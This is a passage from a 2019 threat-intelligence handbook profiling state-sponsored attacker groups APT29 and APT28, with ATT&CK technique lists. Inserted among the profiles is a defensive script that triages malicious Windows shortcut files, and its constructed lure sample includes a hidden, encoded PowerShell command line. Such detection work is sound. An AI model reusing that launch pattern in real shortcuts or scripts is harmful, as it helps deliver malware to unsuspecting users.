
The Cyberthreat Handbook

OCTOBER 2019
Contents _

INTRODUCTION ........................................ p. 4

EXECUTIVE SUMMARY .................................. p. 6

ATTACKERS GROUP .................................... p. 12

INDEX .............................................. p. 202

REFERENCES ......................................... p. 208

NOTES .............................................. p. 226

Introduction _

The cyberthreat landscape is becoming ever more complex, and with exponential growth in the volume of threat-related information, it is becoming impossible to manage this complexity without efficient tools and methods. How to extract the right set of data from this deluge of information? How to focus on the most relevant pieces of this giant puzzle? How to see the big picture? These are crucial questions for organisations and their cybersecurity stakeholders, from the operational teams running an Intrusion Detection System or a Security Operations Centre to strategic decision-makers.

Cyberthreat technical analysis and the creation of meaningful detection signatures are part of the answer. This first edition of the Cyberthreat Handbook attempts to explain the value of cyberthreat technical analysis, and cyberthreat intelligence more broadly, by providing insights about some of the most impactful groups of attackers.

This report is the first of its kind in the world in terms of the quality of its content. It is the result of thousands of hours of information gathering, cross-checking and analysis by our teams of experts, who have conducted an in-depth investigation of attackers' motivations and techniques over a significant period of time.

In order to make the report a real operational tool and not just an inventory of existing cyberthreats, we have not set out to be exhaustive. On the contrary, we have selected the groups that, in our opinion, deserve the most attention. To do this objectively, we designed an exclusive scoring methodology (see page 8) and established individual ratings cards for each group of attackers.

As the report is intended for a broad audience, each ratings card reflects a wide variety of data ranging from general and historical descriptions to a mapping of Tactics, Techniques and Procedures (TTPs).

4 The Cyberthreat Handbook • Thales - Verint


A number of tools are also provided to help users navigate through the report from various entry points.

The information in this report is not necessarily complete. It comes from a wide range of sources and only covers observable behaviours of the groups of attackers concerned. Opinions on the assumed origins of the groups of attackers are based on correlations between data sets and strong matches between the corresponding indicators, but they are not based on 100% certainties.

The collaboration between Thales and Verint on this document is of enormous value. The two companies have combined their knowledge and expertise in order to provide a thorough screening of the main attacker groups (Advanced Persistent Threats, criminal elements, hacktivists, terrorists, etc.) and their assumed countries of origin around the world. It reflects the commitment of our cyberthreat intelligence services to monitor, analyse and understand the global cyberthreat landscape on behalf of our customers and for the benefit of all cybersecurity stakeholders.

When we published our first joint Cyber Threat Landscape exactly one year ago, we explained that it was the first stone of a cyberthreat analysis edifice. Today we are continuing to build this edifice by bringing the world a document that we hope will establish a baseline in the field of cyberthreat analysis.

Pierre JEANNE
Thales
Vice-President, Information Systems Security

Shai ARBEL
Verint
Vice-President, Cyber Threat Intelligence

Executive Summary _

Produced by Thales and Verint, the Cyberthreat Handbook is an original proposal for an environmental analysis of the cyberthreat landscape. This is a dynamic directory which, in its first version, aims to provide a synthetic and rigorous analysis of 66 groups of attackers of global importance today. This work in no way claims to be perfectly exhaustive. The aim is to provide an introduction to cyberthreats from open sources that Thales and Verint consider reliable.

In the form of dedicated ratings cards, the report sets out to familiarise the reader with groups of different profiles. There are cyber-attackers sponsored by Nation States, high-flying cyber-criminal groups, hacktivist groups and cyber-terrorists. This panorama shows that the threat is extremely diversified, both technically, with varied modi operandi, and in terms of performance, some of them demonstrating an extremely high level of technical sophistication, such as the ATK91 group (Xenotime, Triton, TEMP.Veles), capable of infiltrating and manipulating critical infrastructure and industrial control and safety systems (ICS) with its Triton malware.

Several criteria have been used to define what we call the importance of these threats. Some groups will be considered relevant because of their recent nature and performance. In this respect, ATK120 (Lyceum/Hexane), discovered at the end of August 2019, makes a sensational entry into the cyberthreat landscape and has been integrated into this work in this regard. Others have not been active for several years, but their status as Advanced Persistent Threats (APT), characteristic of state-sponsored groups, and their past campaigns lead us to consider them as still part of the same landscape. Nor can the ATK2 group (APT17), for example, whose campaigns seem to have weakened in intensity since 2014, be ignored, since during its last campaign it managed to compromise the websites of the GIFAS, the French aerospace industry association, and the systems of some of its members. More generally, groups are chosen because of their nuisance and/or destruction capacities, their difficulty of detection, their agility and the strength of their motivations, whether their own or those of a higher interest they serve. It would clearly be illusory to hope to map all known attacker groups, first because they are extremely numerous, and also because attack modes are sometimes strongly replicated from one group to another. For example, the IceFog backdoor of the Chinese group of the same name has been widely distributed and used by other groups of Chinese origin. Effective as this program may be, the simple fact of using it is not enough to justify the inclusion of all the groups that might be in a position to use it. By its very nature, the cyber threat landscape is also a highly complex matter to study, with many cyber attackers operating in the shadows, with a clear desire to conceal themselves.

The attacker groups profiled in this report all have one thing in common: they are all significant attackers, in terms of the number of campaigns conducted, the technical competence they demonstrate, the agility of their operating methods and the strength of their motivations. In a word, they are all determined opponents, capable of carrying out significant attacks. Their level of "performance" is variable, as indicated by the scoring system we have established for the purposes of this report. For each of these attackers, we provide a brief description. We detail their names in the various known sources, their nature (state-sponsored, criminal, hacktivist or terrorist), their known targets in terms of sectors of activity and geographical areas, the language they use and their assumed origin, motivations and objectives. We also contextualise the activity of some groups in light of international events that may have occurred during their attack campaigns. These same campaigns are also detailed and illustrated in a timeline for each of the ratings cards in order to trace known activity. Each card also explains the malware used, whether specific to the attacker group or used by others, the legitimate tools used and the vulnerabilities exploited. Finally, we dissect the attacker's usual modus operandi by explaining its Tactics, Techniques and Procedures (TTP) according to the matrix developed by MITRE ATT&CK*. By the same token, the objective is to be able to formally identify a group at the time of an attack through a detailed knowledge of its habits.

The Cyberthreat Handbook thus brings together analyses of nearly 490 attack campaigns conducted in some 40 activity sectors in 39 countries by 66 attackers of various kinds (49% state-sponsored, 26% hacktivist, 20% cybercriminals and 5% terrorists). Most often, state-sponsored groups focus on stealing sensitive data from geopolitical targets of interest and/or critical infrastructure providers, generally using backdoor techniques. Hacktivists pursue ideological motivations (community, religious, political, etc.), denouncing facts deemed unacceptable by conducting DDoS attacks, proselytising or spreading disinformation through defacement. What we call cybercriminals are groups seeking substantial financial gains, for example through the use of ransomware. Finally, cyber-terrorists either have a proselytising approach, in order to find new recruits, or seek to destroy data, with the use of wipers for example, or infrastructures, with defacement and the use of publicly available pentest tools.

Analysis of this broad range of attackers makes it possible to reconstitute the idiosyncrasies of certain types of groups. The most virulent and well-trained attacker groups do not necessarily develop their own malware, for instance. Most use malware developed by others, who make it a specialty. Some design digital weapons, others use them as part of a well-structured offensive strategy. Groups of Chinese origin, for example, have thus developed a habit of sharing their most successful malware with other groups. The other growing trend is the purchase of botnet malware on the Dark Web from the highest bidder, used to distribute much more developed malware in a second phase.

*https://attack.mitre.org/



Idiosyncrasy is also sometimes a matter of geography. Not all attacker groups use the same attack techniques according to their geographical origin. For example, very few Chinese cyber-criminal groups use ransomware, preferring crypto-mining for the vast majority of their attacks. Middle Eastern attackers favour the fraudulent use of social networks and encrypted messaging (WhatsApp, Telegram, etc.), or develop malware dedicated to mobile applications (especially those running on Android). The North Korean groups, each of which specialises in monitoring a specific subject (espionage of the defence sector in the US and Europe / espionage of South Korea / financial crime), are now pooling their attack infrastructures. This strategy makes it very complex to attribute certain attacks to a particular group and leads most observers to amalgamate them under the generic name of Lazarus. These "geographical" specificities can be explained, as in the case of North Korea or China, by the fact that these attacker groups communicate with each other and share attack techniques, often because they are sponsored by the same state entities. They are also sometimes based on technical limitations (for example, the relative unavailability of the Play Store in the Middle East), which direct attackers towards certain modi operandi rather than others. However, this geographical characterisation of attackers through the tools used is not systematic. Russian attackers, whose motivations are varied, use the full cyber arsenal at their disposal, for example.

This broad analysis also makes it possible to identify trends in technical behaviour. In the context of supply chain attacks, for example, as the global defences of organisations are strengthened, attackers are forced to put in place more elaborate tactics to circumvent them. Such attacks therefore remain very effective, and there is a large increase in indirect attacks passing through the suppliers of the various organisations. These suppliers are then used as Trojan horses: they may be the company's usual service providers, used to target computer components integrated into the company's systems (mobile applications, source code, software suppliers, etc.) or connected objects such as surveillance cameras. Another emerging trend is the increasingly widespread code signing of malware, whereby attackers sign their malware with stolen legitimate certificates so as not to arouse the suspicions of many antivirus programs.

We also note that some techniques remain widely used because they are tremendously effective. Most often their success is based on the exploitation of human carelessness and error. Spear-phishing, although as old as cyber itself, thus continues to be effective and widely used.

The main sectors of activity targeted also tell us a lot about the typical profiles that emerge from the analysis. More than half of the groups target government institutions, often defence organisations, followed by the financial, transport, energy and aerospace sectors. It is not surprising that the most competent and motivated opponents are primarily targeting states, their defence capabilities and all the major players in this sector. These attackers, most of whom are themselves state-sponsored, carry out targeted attacks on geopolitical rivals or their strategic operators. Finance is the second sector most affected by attacking groups. Essentially cyber-criminals, these profiles are driven by a quest for significant financial gain. Their offensives are therefore global and target all players in the global financial system. To our knowledge, 137 different geographical areas have been targeted by attacker groups in this sector. The same applies to attacks against major energy players, most often multinationals, with 24 attackers affecting 106 countries. The energy sector has also been the subject of very diversified attacks, with our analysts identifying more than 230 different malware families in use. This is probably due to the increasing number of compromises of proto-IoT or SCADA systems, on which attacks are also developing in the transport sector.

In general, this "top 5" tells us that systems in critical sectors are clearly the most targeted, and that "cyber Pearl Harbor" scenarios involving future smart cities and their key infrastructures, for example, are highly likely. In addition, there are also increasing attacks on the health sector for the theft of targeted personal data or of information on highly sensitive and valuable pharmaceutical products. In the era of informational crisis, the media sector is also increasingly being targeted. Most often these are spoofed copies of an official website used to disseminate false information, or more sophisticated Strategic Web Compromise (SWC, or watering hole) attacks in which the genuine official website is compromised for the same purpose.

The Cyberthreat Handbook also proposes to offer a new and accurate vision of the cyberthreat landscape by establishing a scoring by attacker based on the MITRE ATT&CK matrix. The purpose is to illustrate the level of threat represented by each. This is the second main purpose of this report: to provide a quantified estimate of the level of threat posed by attackers. By knowing their usual tactics, we can establish whether the potential for nuisance and/or destruction is more or less important with regard to their techniques (whether these techniques are more or less easy to implement, whether they allow the attacker to control all or part of a system, whether attackers focus on a limited range of techniques or an elaborate arsenal, and whether they can change techniques regularly and demonstrate a high degree of agility). All these indications are objective parameters that allow us to build an indicative score for each attacker.


The MITRE ATT&CK matrix defines 12 tactics that can be used by an attacker to carry out its campaigns. Each of these 12 tactics encompasses 9 to 68 techniques identified by the MITRE matrix. It is on this model that the Thales/Verint scoring of attackers has been built. For some attackers, the score is not indicated because their techniques are not known. Thus, if an attacker's score is presented as low or even zero, it does not necessarily reflect its true technical level. The latter can be significant but unknown, which reinforces the threat generated. The score is extracted from the following formula:

[Figure (the formula itself is not recoverable from the page): example of profiling an attacker group. The 12 tactics of the MITRE matrix are laid out as columns, with an example of a technique used by the attacker group considered among the 68 techniques of the matrix. In this example the attacker group uses 11 tactics among the 12 of the MITRE matrix and 44 techniques.]



The value of the report is that users can focus their attention on the most relevant threats. The dynamic nature of the directory and its rating system therefore helps to prioritise efforts according to the business and/or the country in which each organisation operates. Indeed, the overarching objective of this report is to help prioritise action by creating intelligence from information.


ATT&CK MITRE Matrix*

Initial Access
Opponents try to enter your network.
Initial access consists of techniques that use various entry vectors to gain an initial foothold within a network. Techniques used to gain a foothold include targeted spear-phishing and exploiting weaknesses on publicly accessible web servers. Footholds gained through initial access may allow continued access, such as valid accounts and the use of external remote services, or may be lost when passwords are changed.

Execution
Opponents try to execute malicious code.
Execution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that execute malicious code are often combined with techniques from all other tactics to achieve broader objectives, such as network exploration or data theft. For example, an opponent may use a remote access tool to execute a PowerShell script that performs remote system discovery.

Persistence
Opponents try to maintain their hold.
Persistence consists of techniques that opponents use to maintain access to systems across restarts, changes in credentials and other interruptions that could cut off their access. Techniques used for persistence include any access, action or configuration change that allows them to maintain control over systems, such as replacing or hijacking legitimate code or adding boot code.

Privilege Escalation
Opponents try to get higher-level permissions.
Privilege escalation consists of techniques that opponents use to obtain higher-level permissions on a system or network. Opponents can often enter and explore a network with non-privileged access, but they need elevated permissions to achieve their objectives. Common approaches include taking advantage of system weaknesses, configuration errors and vulnerabilities. Examples of elevated access are as follows:
- SYSTEM/root level
- Local administrator
- User account with administrator access
- User accounts with access to a specific system or performing a specific function
These techniques often overlap with persistence techniques, as operating system features that allow an opponent to persist can execute in an elevated context.

Defence Evasion
Opponents try to avoid being detected.
Defence evasion consists of techniques that opponents use to avoid being detected throughout their compromise. Techniques used to evade defences include uninstalling or disabling security software and obfuscating or encrypting data and scripts. Opponents also exploit and abuse trusted processes to conceal their presence and hide their malware. The techniques of other tactics are listed here too when they have the additional advantage of subverting defences.

Credential Access
Opponents try to steal account names and passwords.
Credential access consists of techniques for stealing credentials such as account names and passwords. Techniques used to obtain credentials include keylogging and credential dumping. The use of legitimate credentials can allow opponents to access systems, make them more difficult to detect and give them the opportunity to create more accounts to help them achieve their objectives.

Discovery
Opponents try to understand your environment.
Discovery consists of techniques that an opponent can use to acquire knowledge about the system and the internal network. These techniques help opponents to observe the environment and orient themselves before deciding how to act. They also allow opponents to explore what they can control and what is around their entry point, to discover how this could benefit their current objective. Native operating system tools are often used to achieve this post-compromise information collection objective.

Lateral Movement
Opponents try to move in your environment.
Lateral movement consists of techniques that opponents use to enter and control remote systems on a network. To achieve their primary objective, they often need to explore the network to find their target and then access it. Reaching that objective often requires pivoting through multiple systems and accounts. Opponents can install their own remote access tools to perform lateral movement, or use legitimate credentials with native network and operating system tools, which can be stealthier.

Collection
Opponents try to collect data of interest for their objectives.
Collection consists of techniques that opponents use to gather information, and of the sources from which that information is collected, that are relevant to achieving their objectives. Often, the next objective after data collection is to steal (exfiltrate) the data. Common target sources include various types of drives, browsers, audio, video and e-mail tools. Common collection methods include screen capture and keyboard input capture.

Command and Control
Opponents try to communicate with compromised systems to control them.
Command and control consists of techniques that adversaries use to communicate with the systems under their control within a victim network. Opponents generally try to imitate normal and expected traffic to avoid detection. There are many ways for an adversary to establish command and control with different levels of stealth, depending on the structure of the network and the victim's defences.

Exfiltration
Opponents try to steal data.
Exfiltration consists of techniques that opponents use to steal data from your network. Once they have collected the data, opponents often package it to avoid detection while removing it. This may include compression and encryption. Techniques for getting data out of a target network generally include transferring it over a command and control channel or an alternative channel, and may also include imposing size limits on the transmission.

Impact
Opponents try to manipulate, interrupt or destroy your systems and data.
Impact consists of techniques that opponents use to disrupt availability or compromise integrity by manipulating business and operational processes. Techniques used for impact may include the destruction or falsification of data. In some cases, business processes may appear to run normally, but they may have been modified to serve the opponent's objectives. These techniques can be used by opponents to achieve their final objective or to cover up a breach of confidentiality.

*https://attack.mitre.org/

Attackers Group _

ATK7
91

Alias: APT 29, COZER, COZY BEAR, COZY DUKE, COZY CAR, DUKES, EUROAPT, GROUP 100, HAMMER TOSS, MINIDIONIS, OFFICE MONKEYS, SEA DUKE, THE DUKES, YTTRIUM

Threat Actor: State Sponsored (card categories: Cyber Criminal, Cyber Terrorist, Hacktivist, State Sponsored, Unknown)

Targeted Sectors: Defense, Government Agencies, International Organizations

Motivations & Objectives: Cyber Espionage, Data Theft

Language: Russian

DESCRIPTION

ATK7 is an attacker group that has existed since at least 2008 and is believed to act for the Russian government. The group is composed of highly competent, well-organized members, allowing for complex and long-running campaigns. The group's main goal is espionage and intelligence collection. The group therefore targets Western organizations, with a special focus on governmental bodies, think tanks and similar institutions. It has also occasionally expanded its reach to governments in the Middle East, Asia, Africa, etc. In order to reach its goal, the group has used multiple families of malware.

The group aims to act fast, albeit in a noisy way: its campaigns are not designed to be discreet, but to be distributed to many victims, followed by deployment of a malware that will quickly grab and exfiltrate every potentially interesting piece of information. Once a victim of interest has been identified, the group will then often switch to a different, stealthier malware, designed for long-term persistence, in order to gather intelligence. In recent years, the group has been leading these campaigns bi-annually.

The group is suspected to be responsible for the 2015 hack of multiple governmental institutions in the USA, including the White House, the Pentagon and the DoS.

TOOLS, MALWARES AND VULNERABILITIES

Malwares: CloudDuke, CosmicDuke, CozyDuke, GeminiDuke, HammerDuke, MiniDuke, OnionDuke, PinchDuke, SeaDuke
Legitimate software: None
Exploited vulnerabilities: CVE-2010-0232

CAMPAIGNS

2008 - Campaign against Chechnya
The first campaign attributed to APT29 was the two PinchDuke attacks in November 2008. These attacks were associated with fake Turkish websites, the first one mimicking the "Chechan [sic] Informational Center", the other claiming to provide "news from the jihad world" with a section dedicated to Chechnya.

2009 - Campaign against Western countries
During 2009 the Dukes targeted organizations such as the Ministry of Defense of Georgia and the ministries of foreign affairs of Turkey and Uganda, a U.S.-based foreign policy think tank, organizations linked to a NATO exercise in Europe, the Georgian "Information Centre on NATO", and government institutions in Poland and the Czech Republic. They seem to be interested in political matters related to the United States and the North Atlantic Treaty Organization, and in gathering information on Georgia-NATO relations. It is worth noting that the attacks on the US-based think tank, as well as on government institutions in Poland and the Czech Republic, began a few days after Barack Obama, the US President, spoke about missile defense deployment.

2010 - Campaign in the Caucasus
The spring of 2010 saw continued PinchDuke campaigns against Turkey and Georgia, but also numerous campaigns against other members of the Commonwealth of Independent States such as Kazakhstan, Kyrgyzstan, Azerbaijan and Uzbekistan.

2011 - Dukes arsenal expansion campaign
By 2011, the Dukes had already developed at least 3 distinct malware toolsets, including a plethora of supporting components such as loaders and persistence modules. In fact, as a sign of their arsenal's breadth, they had already decided to retire one of these malware toolsets as obsolete after developing a replacement for it, seemingly from scratch.



Targeted Countries _
Azerbaijan, Belgium, Chechnya, Czech Republic, Georgia, Hungary, Ireland, Kazakhstan, Kyrgyzstan, Luxembourg, Poland, Portugal, Romania, Spain, Turkey, United States, Uganda, Ukraine, Uzbekistan

Assumed origin of the attacker: Russia

2013 - Campaign against European countries
During the MiniDuke campaign, ATK7 used spear-phishing with malicious PDF attachments to spread its malware. They used lure documents about political subjects such as "Ukraine's NATO Membership Action Plan (MAP) Debates", "The Informal Asia-Europe Meeting (ASEM) Seminar on Human Rights", and "Ukraine's Search for a Regional Foreign Policy". Kaspersky identified high-profile victims from Ukraine, Belgium, Portugal, Romania, the Czech Republic, Ireland, the United States and Hungary by examining command and control log files.

2013 - Campaign against trade of illegal substances
In September 2013 a CosmicDuke campaign was observed targeting Russian speakers involved in the trade of illegal and controlled substances.

2014 - Campaign with large-scale spreading of CozyDuke
Although CozyDuke had been under development since at least the end of 2011, it was not until the early days of July 2014 that the first large-scale CozyDuke campaign that we are aware of took place.

2014 - Campaign with OnionDuke botnet
The purpose of the OnionDuke variant spread via the Tor node was not to pursue targeted attacks but instead to form a small botnet for later use.

2015 - Campaign with CloudDuke
In July 2015, ATK7 conducted a large-scale phishing campaign using CloudDuke, a new malware. This campaign appears to consist of two waves of spear-phishing emails, one at the beginning and the other at the end of July.

2015 - Campaign against Poland and Georgia
During the CozyDuke and CloudDuke campaigns, ATK7 conducted stealthier and more targeted operations using the CosmicDuke malware. The CosmicDuke campaigns are described by the Polish security company Prevenity, which explains that these two campaigns targeted Polish entities through spear-phishing emails containing a malicious lure document with a Polish-language name. Another campaign targeted Georgian organizations with a lure document named "NATO consolidates control of the Black Sea.docx" (translated from Georgian).

2015 - Campaign against the USA
Starting from July 7, 2015, the group targeted governmental institutions in the USA, including the White House, the Pentagon and the DoS. The group used the SeaDuke malware for this.

2018 - Campaign
After a long period of absence, a phishing campaign associated with APT29 surfaced in 2018. This campaign, targeting think tanks, law enforcement agencies, defense companies and governmental agencies, used a fake document pretending to be from the US Department of State. The group compromised the website of a hospital and a consulting company in order to send its messages. For this campaign, the group used the Cobalt Strike Beacon malware, delivered through malicious Windows shortcuts.

[Timeline figure: Nov-2008 Campaign against Chechnya; 2009 Campaign against Western countries; 2010 Campaign in the Caucasus; 2011 Dukes arsenal expansion campaign; 2013 Campaign against European countries; 2013 Campaign against trade of illegal substances; 2014 Campaign with large-scale spreading of CozyDuke; 2014 Campaign with OnionDuke botnet; 2015 Campaign with CloudDuke; 2015 Campaign with SeaDuke and HammerDuke; 2015 Campaign against Poland and Georgia; 2015 Campaign against the USA; 2018 Campaign.]
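The 2018 campaign above delivered its Beacon stager through malicious Windows shortcuts, which map to T1204 (User Execution) and T1023 (Shortcut Modification) on this group's card. The following is an added example, not code from the handbook or from any vendor report, showing the check a mail-gateway or IR analyst can run on such an attachment: it parses the fixed ShellLinkHeader and the StringData section of the MS-SHLLINK format (the parts that carry the target and command line) and flags the combination a shortcut lure relies on, namely a script host as target, an encoded or hidden command line, a minimised window and a borrowed document-viewer icon. Both sample shortcuts are constructed in-line with build_lnk(); the "encoded" payload is a stand-in string, not a real stager.

```python
"""Triage Windows shortcut (.lnk) lures of the kind used to drop Beacon."""
import re
import struct

HEADER_FMT = "<I16sIIQQQIiIHHII"           # ShellLinkHeader (MS-SHLLINK 2.1)
HEADER_SIZE = struct.calcsize(HEADER_FMT)   # always 0x4C
# CLSID {00021401-0000-0000-C000-000000000046} in little-endian field order.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits that decide which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 1 << 0, 1 << 1
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 1 << 2, 1 << 3, 1 << 4
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 1 << 5, 1 << 6, 1 << 7
# StringData entries appear in this fixed order, each only if its flag is set.
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location")]
SW_SHOWMINNOACTIVE = 7   # ShowCommand value lures use to keep the console off-screen
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe",
                "mshta.exe", "wscript.exe", "cscript.exe", "regsvr32.exe")


def build_lnk(relative_path, arguments="", icon_location=None, show_command=1):
    """Construct a minimal shortcut (no IDList, no LinkInfo) for the samples."""
    values = {"relative_path": relative_path, "arguments": arguments,
              "icon_location": icon_location}
    flags = IS_UNICODE | HAS_RELATIVE_PATH
    flags |= HAS_ARGUMENTS if arguments else 0
    flags |= HAS_ICON_LOCATION if icon_location else 0
    header = struct.pack(HEADER_FMT, HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b""
    for flag, key in STRING_FIELDS:
        if flags & flag:                      # CountCharacters + UTF-16LE text
            text = values[key]
            body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body


def parse_lnk(data):
    """Return ShowCommand plus every StringData string present in the file.
    LinkTargetIDList and LinkInfo are skipped by their own size fields."""
    fields = struct.unpack_from(HEADER_FMT, data, 0)
    header_size, clsid, flags, show_command = fields[0], fields[1], fields[2], fields[9]
    if header_size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:
        off += struct.unpack_from("<I", data, off)[0]
    info = {"show_command": show_command}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        info[key] = data[off:off + count * width].decode(
            "utf-16-le" if width == 2 else "cp1252")
        off += count * width
    return info


def triage(info):
    """Return the reasons the shortcut looks like a lure (empty list = clean)."""
    reasons = []
    target = info.get("relative_path", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = info.get("arguments", "")
    if target in SCRIPT_HOSTS:
        reasons.append(f"target is a script host: {target}")
    if re.search(r"-(?:encodedcommand|enc|ec|e)\b", args, re.I):
        reasons.append("encoded command line")
    if re.search(r"-w(?:indowstyle)?\s+hidden", args, re.I):
        reasons.append("hidden window requested")
    if info.get("show_command") == SW_SHOWMINNOACTIVE:
        reasons.append("shortcut opens minimised (SW_SHOWMINNOACTIVE)")
    icon = info.get("icon_location", "").lower()
    if target in SCRIPT_HOSTS and icon and not icon.endswith(target):
        reasons.append(f"icon borrowed from another program: {icon}")
    return reasons


# Constructed samples, not real artefacts.
BENIGN_LNK = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "report.txt")
LURE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",   # stand-in payload
    icon_location=r"%ProgramFiles%\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe",
    show_command=SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("lure", LURE_LNK)):
        print(label, triage(parse_lnk(blob)) or ["no findings"])
```

A real shortcut also carries a LinkTargetIDList and optional ExtraData blocks (including the machine identifier and MAC address of the host that created it); the parser skips the former by its size field and ignores the latter, which is enough for the command-line checks above but not for attribution work.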


MODUS OPERANDI (ATT&CK FRAMEWORK)


Initial Access
T1078 - Valid Accounts
T1192 - Spearphishing Link
T1193 - Spearphishing Attachment

Execution
T1028 - Windows Remote Management
T1035 - Service Execution
T1047 - Windows Management Instrumentation
T1053 - Scheduled Task
T1059 - Command-Line Interface
T1064 - Scripting
T1085 - Rundll32
T1086 - PowerShell
T1106 - Execution through API
T1203 - Exploitation for Client Execution
T1204 - User Execution

Persistence
T1015 - Accessibility Features
T1023 - Shortcut Modification
T1050 - New Service
T1053 - Scheduled Task
T1060 - Registry Run Keys / Startup Folder
T1078 - Valid Accounts
T1084 - Windows Management Instrumentation Event Subscription
T1098 - Account Manipulation
T1101 - Security Support Provider
T1197 - BITS Jobs

Privilege Escalation
T1015 - Accessibility Features
T1050 - New Service
T1053 - Scheduled Task
T1055 - Process Injection
T1068 - Exploitation for Privilege Escalation
T1078 - Valid Accounts
T1088 - Bypass User Account Control
T1134 - Access Token Manipulation
T1178 - SID-History Injection

Defense Evasion
T1027 - Obfuscated Files or Information
T1036 - Masquerading
T1045 - Software Packing
T1055 - Process Injection
T1064 - Scripting
T1066 - Indicator Removal from Tools
T1070 - Indicator Removal on Host
T1078 - Valid Accounts
T1085 - Rundll32
T1088 - Bypass User Account Control
T1093 - Process Hollowing
T1096 - NTFS File Attributes
T1099 - Timestomp
T1102 - Web Service
T1107 - File Deletion
T1116 - Code Signing
T1134 - Access Token Manipulation
T1197 - BITS Jobs
T1207 - DCShadow
T1497 - Virtualization/Sandbox Evasion

Credential Access
T1003 - Credential Dumping
T1056 - Input Capture
T1081 - Credentials in Files
T1145 - Private Keys

Discovery
T1007 - System Service Discovery
T1010 - Application Window Discovery
T1016 - System Network Configuration Discovery
T1018 - Remote System Discovery
T1033 - System Owner/User Discovery
T1046 - Network Service Scanning
T1057 - Process Discovery
T1063 - Security Software Discovery
T1082 - System Information Discovery
T1083 - File and Directory Discovery
T1087 - Account Discovery
T1124 - System Time Discovery
T1135 - Network Share Discovery
T1497 - Virtualization/Sandbox Evasion

Lateral Movement
T1021 - Remote Services
T1028 - Windows Remote Management
T1075 - Pass the Hash
T1076 - Remote Desktop Protocol
T1077 - Windows Admin Shares
T1097 - Pass the Ticket
T1105 - Remote File Copy
T1175 - Distributed Component Object Model

Collection
T1005 - Data from Local System
T1025 - Data from Removable Media
T1039 - Data from Network Shared Drive
T1056 - Input Capture
T1113 - Screen Capture
T1114 - Email Collection
T1115 - Clipboard Data
T1185 - Man in the Browser

Command and Control
T1001 - Data Obfuscation
T1008 - Fallback Channels
T1024 - Custom Cryptographic Protocol
T1026 - Multiband Communication
T1032 - Standard Cryptographic Protocol
T1043 - Commonly Used Port
T1071 - Standard Application Layer Protocol
T1079 - Multilayer Encryption
T1090 - Connection Proxy
T1094 - Custom Command and Control Protocol
T1095 - Standard Non-Application Layer Protocol
T1102 - Web Service
T1105 - Remote File Copy
T1132 - Data Encoding
T1172 - Domain Fronting
T1188 - Multi-hop Proxy
T1483 - Domain Generation Algorithms

Exfiltration
T1002 - Data Compressed
T1020 - Automated Exfiltration
T1029 - Scheduled Transfer
T1030 - Data Transfer Size Limits
T1048 - Exfiltration Over Alternative Protocol

Impact
T1485 - Data Destruction

Alias _: APT 28, ATK5 (80), FANCY BEAR, GROUP 74, GROUP-4127, IRON TWILIGHT, PAWN STORM, SNAKEMACKEREL, STRONTIUM, SEDNIT, SOFACY, SWALLOWTAIL, TAG_0700, TG-4127, TSAR TEAM
Threat Actor _: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors _: Aerospace, Cybersecurity, Defence, Embassies, Government Agencies, Hospitality, International Organizations, Media
Motivations & Objectives _: Espionage, Political Manipulation
Language: English, Russian, Georgian
Assumed origin of the attacker: Russia

DESCRIPTION
ATK5 is a Russian state-sponsored group of attackers operating since 2004 if not earlier, whose main objective is to steal confidential information from specific targets, such as political and military targets, that benefit the Russian government. It is a skilled team with the capabilities to develop complex modular malware and exploit multiple 0-days. Their malware is compiled with Russian language settings and during Russian office working hours. Despite a number of public disclosures from European governments and indictments from the U.S. Department of Justice, this adversary continues to launch operations targeting the political and defence sector in Europe and Eurasia.

Between 2007 and 2014, ATK5 had three kinds of targets:
• Georgian government agencies (Ministry of Internal Affairs and Ministry of Defence) or citizens,
• Eastern European governments,
• Security organisations.

The attack on the Georgian Ministry of Defense can be a response to the growing U.S.-Georgian military relationship. In 2013, the group targeted a journalist, which is a way to monitor public opinion, spread disinformation or identify dissidents.

During 2015 and 2016, this group's activity increased significantly, with numerous attacks against government departments and embassies all over the world. Among their most notable presumed targets are the American Democratic National Committee, the German parliament and the French television network TV5Monde. ATK5 seems to have a special interest in Eastern Europe, where it regularly targets individuals and organizations involved in geopolitics. They have also been implicated in the U.S. presidential election attacks in late 2016.

The 2016 attacks were visible and disruptive, but in 2017 the group made a major shift to stealthier attacks to gather intelligence about a range of targets.

One of the striking characteristics of ATK5 is its ability to come up with brand-new 0-day vulnerabilities regularly. In 2015, the group exploited no fewer than six 0-day vulnerabilities. This high number of 0-day exploits suggests significant resources are available, either because the group members have the skills and time to find and weaponize these vulnerabilities, or because they have the budget to purchase the exploits. In addition, ATK5 tries to profile its target system to deploy only the needed tools. This prevents researchers from having access to their full arsenal.

TOOLS, MALWARES AND VULNERABILITIES

